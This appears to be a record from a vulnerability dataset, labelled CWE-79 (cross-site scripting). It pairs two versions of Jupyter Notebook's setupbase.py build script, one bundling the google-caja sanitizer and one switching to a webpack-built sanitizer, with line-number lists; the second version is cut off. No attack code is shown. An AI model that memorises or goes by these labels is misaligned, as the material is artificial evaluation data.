return CLASS_0(
VAR_1=an_enum_value,
VAR_2=some_dict,
VAR_5=a_camel_date_time,
VAR_3=a_date,
VAR_6=nested_list_of_enums,
)
| [
2,
6,
9,
10,
14,
22,
25,
28,
31,
33,
42,
44,
46,
48,
56,
60,
65,
70,
72,
74,
76,
82,
84,
86,
88,
96,
13
] | [
2,
6,
9,
10,
14,
22,
25,
27,
30,
33,
35,
44,
46,
48,
56,
60,
62,
67,
72,
74,
76,
78,
84,
86,
88,
96,
13
] |
1CWE-79
| """
This module defines the things that are used in setup.py for building the notebook
This includes:
* Functions for finding things like packages, package data, etc.
* A function for checking dependencies.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import re
import pipes
import shutil
import sys
from distutils import log
from distutils.cmd import Command
from fnmatch import fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import list2cmdline
else:
def list2cmdline(cmd_list):
return ' '.join(map(pipes.quote, cmd_list))
#-------------------------------------------------------------------------------
# Useful globals and utility functions
#-------------------------------------------------------------------------------
# A few handy globals
isfile = os.path.isfile
pjoin = os.path.join
repo_root = os.path.dirname(os.path.abspath(__file__))
is_repo = os.path.isdir(pjoin(repo_root, '.git'))
def oscmd(s):
print(">", s)
os.system(s)
# Py3 compatibility hacks, without assuming IPython itself is installed with
# the full py3compat machinery.
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
#---------------------------------------------------------------------------
# Basic project information
#---------------------------------------------------------------------------
name = 'notebook'
# release.py contains version, authors, license, url, keywords, etc.
version_ns = {}
execfile(pjoin(repo_root, name, '_version.py'), version_ns)
version = version_ns['__version__']
# vendored from pep440 package, we allow `.dev` suffix without trailing number.
loose_pep440re = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not loose_pep440re.match(version):
raise ValueError('Invalid version number `%s`, please follow pep440 convention or pip will get confused about which package is more recent.' % version)
#---------------------------------------------------------------------------
# Find packages
#---------------------------------------------------------------------------
def find_packages():
"""
Find all of the packages.
"""
packages = []
for dir,subdirs,files in os.walk(name):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
#---------------------------------------------------------------------------
# Find package data
#---------------------------------------------------------------------------
def find_package_data():
"""
Find package_data.
"""
# This is not enough for these things to appear in a sdist.
# We need to muck with the MANIFEST to get this to work
# exclude components and less from the walk;
# we will build the components separately
excludes = [
pjoin('static', 'components'),
pjoin('static', '*', 'less'),
pjoin('static', '*', 'node_modules')
]
# walk notebook resources:
cwd = os.getcwd()
os.chdir('notebook')
static_data = []
for parent, dirs, files in os.walk('static'):
if any(fnmatch(parent, pat) for pat in excludes):
# prevent descending into subdirs
dirs[:] = []
continue
for f in files:
static_data.append(pjoin(parent, f))
# for verification purposes, explicitly add main.min.js
# so that installation will fail if they are missing
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
static_data.append(pjoin('static', app, 'js', 'main.min.js'))
components = pjoin("static", "components")
# select the components we actually need to install
# (there are lots of resources we bundle for sdist-reasons that we don't actually use)
static_data.extend([
pjoin(components, "backbone", "backbone-min.js"),
pjoin(components, "bootstrap", "dist", "js", "bootstrap.min.js"),
pjoin(components, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
pjoin(components, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
pjoin(components, "create-react-class", "index.js"),
pjoin(components, "font-awesome", "css", "*.css"),
pjoin(components, "es6-promise", "*.js"),
pjoin(components, "font-awesome", "fonts", "*.*"),
pjoin(components, "google-caja", "html-css-sanitizer-minified.js"),
pjoin(components, "jed", "jed.js"),
pjoin(components, "jquery", "jquery.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
pjoin(components, "jquery-ui", "jquery-ui.min.js"),
pjoin(components, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
pjoin(components, "jquery-ui", "themes", "smoothness", "images", "*"),
pjoin(components, "marked", "lib", "marked.js"),
pjoin(components, "react", "react.production.min.js"),
pjoin(components, "react", "react-dom.production.min.js"),
pjoin(components, "requirejs", "require.js"),
pjoin(components, "requirejs-plugins", "src", "json.js"),
pjoin(components, "requirejs-text", "text.js"),
pjoin(components, "underscore", "underscore-min.js"),
pjoin(components, "moment", "moment.js"),
pjoin(components, "moment", "min", "*.js"),
pjoin(components, "xterm.js", "index.js"),
pjoin(components, "xterm.js-css", "index.css"),
pjoin(components, "xterm.js-fit", "index.js"),
pjoin(components, "text-encoding", "lib", "encoding.js"),
])
# Ship all of Codemirror's CSS and JS
for parent, dirs, files in os.walk(pjoin(components, 'codemirror')):
for f in files:
if f.endswith(('.js', '.css')):
static_data.append(pjoin(parent, f))
# Trim mathjax
mj = lambda *path: pjoin(components, 'MathJax', *path)
static_data.extend([
mj('MathJax.js'),
mj('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
mj('config', 'Safe.js'),
])
trees = []
mj_out = mj('jax', 'output')
if os.path.exists(mj_out):
for output in os.listdir(mj_out):
path = pjoin(mj_out, output)
static_data.append(pjoin(path, '*.js'))
autoload = pjoin(path, 'autoload')
if os.path.isdir(autoload):
trees.append(autoload)
for tree in trees + [
mj('localization'), # limit to en?
mj('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
mj('extensions'),
mj('jax', 'input', 'TeX'),
mj('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
mj('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
mj('jax', 'element', 'mml'),
]:
for parent, dirs, files in os.walk(tree):
for f in files:
static_data.append(pjoin(parent, f))
os.chdir(os.path.join('tests',))
js_tests = glob('*.js') + glob('*/*.js')
os.chdir(cwd)
package_data = {
'notebook' : ['templates/*'] + static_data,
'notebook.tests' : js_tests,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return package_data
def check_package_data(package_data):
"""verify that package_data globs make sense"""
print("checking package data")
for pkg, data in package_data.items():
pkg_root = pjoin(*pkg.split('.'))
for d in data:
path = pjoin(pkg_root, d)
if '*' in path:
assert len(glob(path)) > 0, "No files match pattern %s" % path
else:
assert os.path.exists(path), "Missing package data: %s" % path
def check_package_data_first(command):
"""decorator for checking package_data before running a given command
Probably only needs to wrap build_py
"""
class DecoratedCommand(command):
def run(self):
check_package_data(self.package_data)
command.run(self)
return DecoratedCommand
def update_package_data(distribution):
"""update package_data to catch changes during setup"""
build_py = distribution.get_command_obj('build_py')
distribution.package_data = find_package_data()
# re-init build_py options which load package_data
build_py.finalize_options()
#---------------------------------------------------------------------------
# Notebook related
#---------------------------------------------------------------------------
try:
from shutil import which
except ImportError:
## which() function copied from Python 3.4.3; PSF license
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
static = pjoin(repo_root, 'notebook', 'static')
npm_path = os.pathsep.join([
pjoin(repo_root, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def mtime(path):
"""shorthand for mtime"""
return os.stat(path).st_mtime
def run(cmd, *args, **kwargs):
"""Echo a command before running it"""
log.info('> ' + list2cmdline(cmd))
kwargs['shell'] = (sys.platform == 'win32')
return check_call(cmd, *args, **kwargs)
class CompileBackendTranslation(Command):
description = "compile the .po files into .mo files, that contain the translations."
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
paths = glob('notebook/i18n/??_??')
for p in paths:
LANG = p[-5:]
for component in ['notebook', 'nbui']:
run(['pybabel', 'compile',
'-D', component,
'-f',
'-l', LANG,
'-i', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.po'),
'-o', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.mo')
])
class Bower(Command):
description = "fetch static client-side components with bower"
user_options = [
('force', 'f', "force fetching of bower dependencies"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
bower_dir = pjoin(static, 'components')
node_modules = pjoin(repo_root, 'node_modules')
def should_run(self):
if self.force:
return True
if not os.path.exists(self.bower_dir):
return True
return mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json'))
def should_run_npm(self):
if not which('npm'):
print("npm unavailable", file=sys.stderr)
return False
if not os.path.exists(self.node_modules):
return True
return mtime(self.node_modules) < mtime(pjoin(repo_root, 'package.json'))
def run(self):
if not self.should_run():
print("bower dependencies up to date")
return
if self.should_run_npm():
print("installing build dependencies with npm")
run(['npm', 'install'], cwd=repo_root)
os.utime(self.node_modules, None)
env = os.environ.copy()
env['PATH'] = npm_path
try:
run(
['bower', 'install', '--allow-root', '--config.interactive=false'],
cwd=repo_root,
env=env
)
except OSError as e:
print("Failed to run bower: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# self.npm_components()
os.utime(self.bower_dir, None)
# update package data in case this created new files
update_package_data(self.distribution)
def patch_out_bootstrap_bw_print():
"""Hack! Manually patch out the bootstrap rule that forces printing in B&W.
We haven't found a way to override this rule with another one.
"""
print_less = pjoin(static, 'components', 'bootstrap', 'less', 'print.less')
with open(print_less) as f:
lines = f.readlines()
for ix, line in enumerate(lines):
if 'Black prints faster' in line:
break
else:
return # Already patched out, nothing to do.
rmed = lines.pop(ix)
print("Removed line", ix, "from bootstrap print.less:")
print("-", rmed)
print()
with open(print_less, 'w') as f:
f.writelines(lines)
class CompileCSS(Command):
"""Recompile Notebook CSS
Regenerate the compiled CSS from LESS sources.
Requires various dev dependencies, such as require and lessc.
"""
description = "Recompile Notebook CSS"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
sources = []
targets = []
for name in ('ipython', 'style'):
sources.append(pjoin(static, 'style', '%s.less' % name))
targets.append(pjoin(static, 'style', '%s.min.css' % name))
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
patch_out_bootstrap_bw_print()
for src, dst in zip(self.sources, self.targets):
try:
run(['lessc',
'--source-map',
'--include-path=%s' % pipes.quote(static),
src,
dst,
], cwd=repo_root, env=env)
except OSError as e:
print("Failed to build css: %s" % e, file=sys.stderr)
print("You can install js dependencies with `npm install`", file=sys.stderr)
raise
# update package data in case this created new files
update_package_data(self.distribution)
class CompileJS(Command):
"""Rebuild Notebook Javascript main.min.js files and translation files.
Calls require via build-main.js
"""
description = "Rebuild Notebook Javascript main.min.js files"
user_options = [
('force', 'f', "force rebuilding js targets"),
]
def initialize_options(self):
self.force = False
def finalize_options(self):
self.force = bool(self.force)
apps = ['notebook', 'tree', 'edit', 'terminal', 'auth']
targets = [ pjoin(static, app, 'js', 'main.min.js') for app in apps ]
def sources(self, name):
"""Generator yielding .js sources that an application depends on"""
yield pjoin(repo_root, 'tools', 'build-main.js')
yield pjoin(static, name, 'js', 'main.js')
for sec in [name, 'base', 'auth']:
for f in glob(pjoin(static, sec, 'js', '*.js')):
if not f.endswith('.min.js'):
yield f
yield pjoin(static, 'services', 'config.js')
if name == 'notebook':
for f in glob(pjoin(static, 'services', '*', '*.js')):
yield f
for parent, dirs, files in os.walk(pjoin(static, 'components')):
if os.path.basename(parent) == 'MathJax':
# don't look in MathJax, since it takes forever to walk it
dirs[:] = []
continue
for f in files:
yield pjoin(parent, f)
def should_run(self, name, target):
if self.force or not os.path.exists(target):
return True
target_mtime = mtime(target)
for source in self.sources(name):
if mtime(source) > target_mtime:
print(source, target)
return True
return False
def build_main(self, name):
"""Build main.min.js"""
target = pjoin(static, name, 'js', 'main.min.js')
if not self.should_run(name, target):
log.info("%s up to date" % target)
return
log.info("Rebuilding %s" % target)
run(['node', 'tools/build-main.js', name])
def build_jstranslation(self, trd):
lang = trd[-5:]
run([
pjoin('node_modules', '.bin', 'po2json'),
'-p', '-F',
'-f', 'jed1.x',
'-d', 'nbjs',
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.po'),
pjoin('notebook', 'i18n', lang, 'LC_MESSAGES', 'nbjs.json'),
])
def run(self):
self.run_command('jsdeps')
env = os.environ.copy()
env['PATH'] = npm_path
pool = ThreadPool()
pool.map(self.build_main, self.apps)
pool.map(self.build_jstranslation, glob('notebook/i18n/??_??'))
# update package data in case this created new files
update_package_data(self.distribution)
class JavascriptVersion(Command):
"""write the javascript version to notebook javascript"""
description = "Write Jupyter version to javascript"
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
nsfile = pjoin(repo_root, "notebook", "static", "base", "js", "namespace.js")
with open(nsfile) as f:
lines = f.readlines()
with open(nsfile, 'w') as f:
found = False
for line in lines:
if line.strip().startswith("Jupyter.version"):
line = ' Jupyter.version = "{0}";\n'.format(version)
found = True
f.write(line)
if not found:
raise RuntimeError("Didn't find Jupyter.version line in %s" % nsfile)
def css_js_prerelease(command, strict=False):
"""decorator for building minified js/css prior to another command"""
class DecoratedCommand(command):
def run(self):
self.distribution.run_command('jsversion')
jsdeps = self.distribution.get_command_obj('jsdeps')
js = self.distribution.get_command_obj('js')
css = self.distribution.get_command_obj('css')
jsdeps.force = js.force = strict
targets = [ jsdeps.bower_dir ]
targets.extend(js.targets)
targets.extend(css.targets)
missing = [ t for t in targets if not os.path.exists(t) ]
if not is_repo and not missing:
# If we're an sdist, we aren't a repo and everything should be present.
# Don't rebuild js/css in that case.
command.run(self)
return
try:
self.distribution.run_command('js')
self.distribution.run_command('css')
self.distribution.run_command('backendtranslations')
except Exception as e:
# refresh missing
missing = [ t for t in targets if not os.path.exists(t) ]
if strict or missing:
# die if strict or any targets didn't build
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
log.warn("rebuilding js and css failed. The following required files are missing: %s" % missing)
raise e
else:
log.warn("rebuilding js and css failed (not a problem)")
log.warn(str(e))
# check again for missing targets, just in case:
missing = [ t for t in targets if not os.path.exists(t) ]
if missing:
# command succeeded, but targets still missing (?!)
prefix = os.path.commonprefix([repo_root + os.sep] + missing)
missing = [ m[len(prefix):] for m in missing ]
raise ValueError("The following required files are missing: %s" % missing)
command.run(self)
return DecoratedCommand
| """
This module defines the things that are used in setup.py for building the notebook
This includes:
* Functions for finding things like packages, package data, etc.
* A function for checking dependencies.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import os
import re
import pipes
import shutil
import sys
from distutils import log
from distutils.cmd import Command
from fnmatch import fnmatch
from glob import glob
from multiprocessing.pool import ThreadPool
from subprocess import check_call
if sys.platform == 'win32':
from subprocess import list2cmdline
else:
def list2cmdline(cmd_list):
return ' '.join(map(pipes.quote, cmd_list))
#-------------------------------------------------------------------------------
# Useful globals and utility functions
#-------------------------------------------------------------------------------
# A few handy globals
isfile = os.path.isfile
pjoin = os.path.join
repo_root = os.path.dirname(os.path.abspath(__file__))
is_repo = os.path.isdir(pjoin(repo_root, '.git'))
def oscmd(s):
print(">", s)
os.system(s)
# Py3 compatibility hacks, without assuming IPython itself is installed with
# the full py3compat machinery.
try:
execfile
except NameError:
def execfile(fname, globs, locs=None):
locs = locs or globs
exec(compile(open(fname).read(), fname, "exec"), globs, locs)
#---------------------------------------------------------------------------
# Basic project information
#---------------------------------------------------------------------------
name = 'notebook'
# release.py contains version, authors, license, url, keywords, etc.
version_ns = {}
execfile(pjoin(repo_root, name, '_version.py'), version_ns)
version = version_ns['__version__']
# vendored from pep440 package, we allow `.dev` suffix without trailing number.
loose_pep440re = re.compile(r'^([1-9]\d*!)?(0|[1-9]\d*)(\.(0|[1-9]\d*))*((a|b|rc)(0|[1-9]\d*))?(\.post(0|[1-9]\d*))?(\.dev(0|[1-9]\d*)?)?$')
if not loose_pep440re.match(version):
raise ValueError('Invalid version number `%s`, please follow pep440 convention or pip will get confused about which package is more recent.' % version)
#---------------------------------------------------------------------------
# Find packages
#---------------------------------------------------------------------------
def find_packages():
"""
Find all of the packages.
"""
packages = []
for dir,subdirs,files in os.walk(name):
package = dir.replace(os.path.sep, '.')
if '__init__.py' not in files:
# not a package
continue
packages.append(package)
return packages
#---------------------------------------------------------------------------
# Find package data
#---------------------------------------------------------------------------
def find_package_data():
"""
Find package_data.
"""
# This is not enough for these things to appear in a sdist.
# We need to muck with the MANIFEST to get this to work
# exclude components and less from the walk;
# we will build the components separately
excludes = [
pjoin('static', 'components'),
pjoin('static', '*', 'less'),
pjoin('static', '*', 'node_modules')
]
# walk notebook resources:
cwd = os.getcwd()
os.chdir('notebook')
static_data = []
for parent, dirs, files in os.walk('static'):
if any(fnmatch(parent, pat) for pat in excludes):
# prevent descending into subdirs
dirs[:] = []
continue
for f in files:
static_data.append(pjoin(parent, f))
# for verification purposes, explicitly add main.min.js
# so that installation will fail if they are missing
for app in ['auth', 'edit', 'notebook', 'terminal', 'tree']:
static_data.append(pjoin('static', app, 'js', 'main.min.js'))
components = pjoin("static", "components")
# select the components we actually need to install
# (there are lots of resources we bundle for sdist-reasons that we don't actually use)
static_data.extend([
pjoin(components, "backbone", "backbone-min.js"),
pjoin(components, "bootstrap", "dist", "js", "bootstrap.min.js"),
pjoin(components, "bootstrap-tour", "build", "css", "bootstrap-tour.min.css"),
pjoin(components, "bootstrap-tour", "build", "js", "bootstrap-tour.min.js"),
pjoin(components, "create-react-class", "index.js"),
pjoin(components, "font-awesome", "css", "*.css"),
pjoin(components, "es6-promise", "*.js"),
pjoin(components, "font-awesome", "fonts", "*.*"),
pjoin(components, "jed", "jed.js"),
pjoin(components, "jquery", "jquery.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.js"),
pjoin(components, "jquery-typeahead", "dist", "jquery.typeahead.min.css"),
pjoin(components, "jquery-ui", "jquery-ui.min.js"),
pjoin(components, "jquery-ui", "themes", "smoothness", "jquery-ui.min.css"),
pjoin(components, "jquery-ui", "themes", "smoothness", "images", "*"),
pjoin(components, "marked", "lib", "marked.js"),
pjoin(components, "react", "react.production.min.js"),
pjoin(components, "react", "react-dom.production.min.js"),
pjoin(components, "requirejs", "require.js"),
pjoin(components, "requirejs-plugins", "src", "json.js"),
pjoin(components, "requirejs-text", "text.js"),
pjoin(components, "sanitizer", "index.js"),
pjoin(components, "underscore", "underscore-min.js"),
pjoin(components, "moment", "moment.js"),
pjoin(components, "moment", "min", "*.js"),
pjoin(components, "xterm.js", "index.js"),
pjoin(components, "xterm.js-css", "index.css"),
pjoin(components, "xterm.js-fit", "index.js"),
pjoin(components, "text-encoding", "lib", "encoding.js"),
])
# Ship all of Codemirror's CSS and JS
for parent, dirs, files in os.walk(pjoin(components, 'codemirror')):
for f in files:
if f.endswith(('.js', '.css')):
static_data.append(pjoin(parent, f))
# Trim mathjax
mj = lambda *path: pjoin(components, 'MathJax', *path)
static_data.extend([
mj('MathJax.js'),
mj('config', 'TeX-AMS-MML_HTMLorMML-full.js'),
mj('config', 'Safe.js'),
])
trees = []
mj_out = mj('jax', 'output')
if os.path.exists(mj_out):
for output in os.listdir(mj_out):
path = pjoin(mj_out, output)
static_data.append(pjoin(path, '*.js'))
autoload = pjoin(path, 'autoload')
if os.path.isdir(autoload):
trees.append(autoload)
for tree in trees + [
mj('localization'), # limit to en?
mj('fonts', 'HTML-CSS', 'STIX-Web', 'woff'),
mj('extensions'),
mj('jax', 'input', 'TeX'),
mj('jax', 'output', 'HTML-CSS', 'fonts', 'STIX-Web'),
mj('jax', 'output', 'SVG', 'fonts', 'STIX-Web'),
mj('jax', 'element', 'mml'),
]:
for parent, dirs, files in os.walk(tree):
for f in files:
static_data.append(pjoin(parent, f))
os.chdir(os.path.join('tests',))
js_tests = glob('*.js') + glob('*/*.js')
os.chdir(cwd)
package_data = {
'notebook' : ['templates/*'] + static_data,
'notebook.tests' : js_tests,
'notebook.bundler.tests': ['resources/*', 'resources/*/*', 'resources/*/*/.*'],
'notebook.services.api': ['api.yaml'],
'notebook.i18n': ['*/LC_MESSAGES/*.*'],
}
return package_data
def check_package_data(package_data):
"""verify that package_data globs make sense"""
print("checking package data")
for pkg, data in package_data.items():
pkg_root = pjoin(*pkg.split('.'))
for d in data:
path = pjoin(pkg_root, d)
if '*' in path:
assert len(glob(path)) > 0, "No files match pattern %s" % path
else:
assert os.path.exists(path), "Missing package data: %s" % path
def check_package_data_first(command):
"""decorator for checking package_data before running a given command
Probably only needs to wrap build_py
"""
class DecoratedCommand(command):
def run(self):
check_package_data(self.package_data)
command.run(self)
return DecoratedCommand
def update_package_data(distribution):
"""update package_data to catch changes during setup"""
build_py = distribution.get_command_obj('build_py')
distribution.package_data = find_package_data()
# re-init build_py options which load package_data
build_py.finalize_options()
#---------------------------------------------------------------------------
# Notebook related
#---------------------------------------------------------------------------
try:
from shutil import which
except ImportError:
## which() function copied from Python 3.4.3; PSF license
def which(cmd, mode=os.F_OK | os.X_OK, path=None):
"""Given a command, mode, and a PATH string, return the path which
conforms to the given mode on the PATH, or None if there is no such
file.
`mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result
of os.environ.get("PATH"), or can be overridden with a custom search
path.
"""
# Check that a given file can be accessed with the correct mode.
# Additionally check that `file` is not a directory, as on Windows
# directories pass the os.access check.
def _access_check(fn, mode):
return (os.path.exists(fn) and os.access(fn, mode)
and not os.path.isdir(fn))
# If we're given a path with a directory part, look it up directly rather
# than referring to PATH directories. This includes checking relative to the
# current directory, e.g. ./script
if os.path.dirname(cmd):
if _access_check(cmd, mode):
return cmd
return None
if path is None:
path = os.environ.get("PATH", os.defpath)
if not path:
return None
path = path.split(os.pathsep)
if sys.platform == "win32":
# The current directory takes precedence on Windows.
if not os.curdir in path:
path.insert(0, os.curdir)
# PATHEXT is necessary to check on Windows.
pathext = os.environ.get("PATHEXT", "").split(os.pathsep)
# See if the given file matches any of the expected path extensions.
# This will allow us to short circuit when given "python.exe".
# If it does match, only test that one, otherwise we have to try
# others.
if any(cmd.lower().endswith(ext.lower()) for ext in pathext):
files = [cmd]
else:
files = [cmd + ext for ext in pathext]
else:
# On other platforms you don't have things like PATHEXT to tell you
# what file suffixes are executable, so just pass on cmd as-is.
files = [cmd]
seen = set()
for dir in path:
normdir = os.path.normcase(dir)
if not normdir in seen:
seen.add(normdir)
for thefile in files:
name = os.path.join(dir, thefile)
if _access_check(name, mode):
return name
return None
static = pjoin(repo_root, 'notebook', 'static')
npm_path = os.pathsep.join([
pjoin(repo_root, 'node_modules', '.bin'),
os.environ.get("PATH", os.defpath),
])
def mtime(path):
"""shorthand for mtime"""
return os.stat(path).st_mtime
def run(cmd, *args, **kwargs):
"""Echo a command before running it"""
log.info('> ' + list2cmdline(cmd))
kwargs['shell'] = (sys.platform == 'win32')
return check_call(cmd, *args, **kwargs)
class CompileBackendTranslation(Command):
description = "compile the .po files into .mo files, that contain the translations."
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
paths = glob('notebook/i18n/??_??')
for p in paths:
LANG = p[-5:]
for component in ['notebook', 'nbui']:
run(['pybabel', 'compile',
'-D', component,
'-f',
'-l', LANG,
'-i', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.po'),
'-o', pjoin('notebook', 'i18n', LANG, 'LC_MESSAGES', component+'.mo')
])
class Bower(Command):
    """Fetch static client-side components with bower and build the
    webpack-produced sanitizer bundle when it is missing or stale."""

    description = "fetch static client-side components with bower"
    user_options = [
        ('force', 'f', "force fetching of bower dependencies"),
    ]

    def initialize_options(self):
        self.force = False

    def finalize_options(self):
        self.force = bool(self.force)

    bower_dir = pjoin(static, 'components')
    node_modules = pjoin(repo_root, 'node_modules')
    sanitizer_dir = pjoin(bower_dir, 'sanitizer')

    def should_run(self):
        """Decide whether the bower/webpack step needs to happen at all."""
        if self.force:
            return True
        # A missing output directory always forces a run.
        for required_dir in (self.bower_dir, self.sanitizer_dir):
            if not os.path.exists(required_dir):
                return True
        # Rebuild when bower.json is newer than the fetched components ...
        if mtime(self.bower_dir) < mtime(pjoin(repo_root, 'bower.json')):
            return True
        # ... or when the webpack config is newer than the sanitizer bundle.
        return mtime(self.sanitizer_dir) < mtime(pjoin(repo_root, 'webpack.config.js'))

    def should_run_npm(self):
        """`npm install` is needed when node_modules is missing or stale."""
        if not which('npm'):
            print("npm unavailable", file=sys.stderr)
            return False
        if not os.path.exists(self.node_modules):
            return True
        return mtime(self.node_modules) < mtime(pjoin(repo_root, 'package.json'))

    def run(self):
        if not self.should_run():
            print("bower dependencies up to date")
            return
        if self.should_run_npm():
            print("installing build dependencies with npm")
            run(['npm', 'install'], cwd=repo_root)
            os.utime(self.node_modules, None)
        child_env = os.environ.copy()
        child_env['PATH'] = npm_path
        bower_cmd = ['bower', 'install', '--allow-root', '--config.interactive=false']
        try:
            run(bower_cmd, cwd=repo_root, env=child_env)
        except OSError as e:
            print("Failed to run bower: %s" % e, file=sys.stderr)
            print("You can install js dependencies with `npm install`", file=sys.stderr)
            raise
        # The sanitizer bundle is produced by webpack, not by bower.
        if not os.path.exists(self.sanitizer_dir):
            run(['npm', 'run', 'build:webpack'], cwd=repo_root, env=child_env)
        os.utime(self.bower_dir, None)
        # update package data in case this created new files
        update_package_data(self.distribution)
def patch_out_bootstrap_bw_print():
    """Hack! Manually patch out the bootstrap rule that forces printing in B&W.

    We haven't found a way to override this rule with another one.
    """
    print_less = pjoin(static, 'components', 'bootstrap', 'less', 'print.less')
    with open(print_less) as f:
        lines = f.readlines()
    # Locate the offending rule by its identifying comment text.
    target_ix = None
    for ix, line in enumerate(lines):
        if 'Black prints faster' in line:
            target_ix = ix
            break
    if target_ix is None:
        return  # Already patched out, nothing to do.
    rmed = lines.pop(target_ix)
    print("Removed line", target_ix, "from bootstrap print.less:")
    print("-", rmed)
    print()
    with open(print_less, 'w') as f:
        f.writelines(lines)
class CompileCSS(Command):
    """Recompile Notebook CSS.

    Regenerate the compiled CSS from LESS sources.
    Requires various dev dependencies, such as require and lessc.
    """

    description = "Recompile Notebook CSS"
    user_options = []

    def initialize_options(self):
        pass

    def finalize_options(self):
        pass

    # Parallel lists: each .less source maps to its .min.css target.
    sources = []
    targets = []
    for name in ('ipython', 'style'):
        sources.append(pjoin(static, 'style', name + '.less'))
        targets.append(pjoin(static, 'style', name + '.min.css'))

    def run(self):
        self.run_command('jsdeps')
        less_env = os.environ.copy()
        less_env['PATH'] = npm_path
        patch_out_bootstrap_bw_print()
        include_arg = '--include-path=%s' % pipes.quote(static)
        for src, dst in zip(self.sources, self.targets):
            try:
                run(['lessc',
                     '--source-map',
                     include_arg,
                     src,
                     dst,
                     ], cwd=repo_root, env=less_env)
            except OSError as e:
                print("Failed to build css: %s" % e, file=sys.stderr)
                print("You can install js dependencies with `npm install`", file=sys.stderr)
                raise
        # update package data in case this created new files
        update_package_data(self.distribution)
class CompileJS(Command):
    """Rebuild Notebook Javascript main.min.js files and translation files.
    Calls require via build-main.js
    """
    description = "Rebuild Notebook Javascript main.min.js files"
    user_options = [
        ('force', 'f', "force rebuilding js targets"),
    ]
    def initialize_options(self):
        self.force = False
    def finalize_options(self):
        self.force = bool(self.force)
    # One bundled entry point per notebook application page.
    apps = ['notebook', 'tree', 'edit', 'terminal', 'auth']
    targets = [ pjoin(static, app, 'js', 'main.min.js') for app in apps ]
    def sources(self, name):
        """Generator yielding .js sources that an application depends on"""
        yield pjoin(repo_root, 'tools', 'build-main.js')
        yield pjoin(static, name, 'js', 'main.js')
        # App-local sources plus the shared 'base' and 'auth' sections.
        for sec in [name, 'base', 'auth']:
            for f in glob(pjoin(static, sec, 'js', '*.js')):
                if not f.endswith('.min.js'):
                    yield f
        yield pjoin(static, 'services', 'config.js')
        if name == 'notebook':
            for f in glob(pjoin(static, 'services', '*', '*.js')):
                yield f
        for parent, dirs, files in os.walk(pjoin(static, 'components')):
            if os.path.basename(parent) == 'MathJax':
                # don't look in MathJax, since it takes forever to walk it
                dirs[:] = []
                continue
            for f in files:
                yield pjoin(parent, f)
    def should_run(self, name, target):
        """Return True when *target* is absent or older than any of *name*'s sources."""
        if self.force or not os.path.exists(target):
            return True
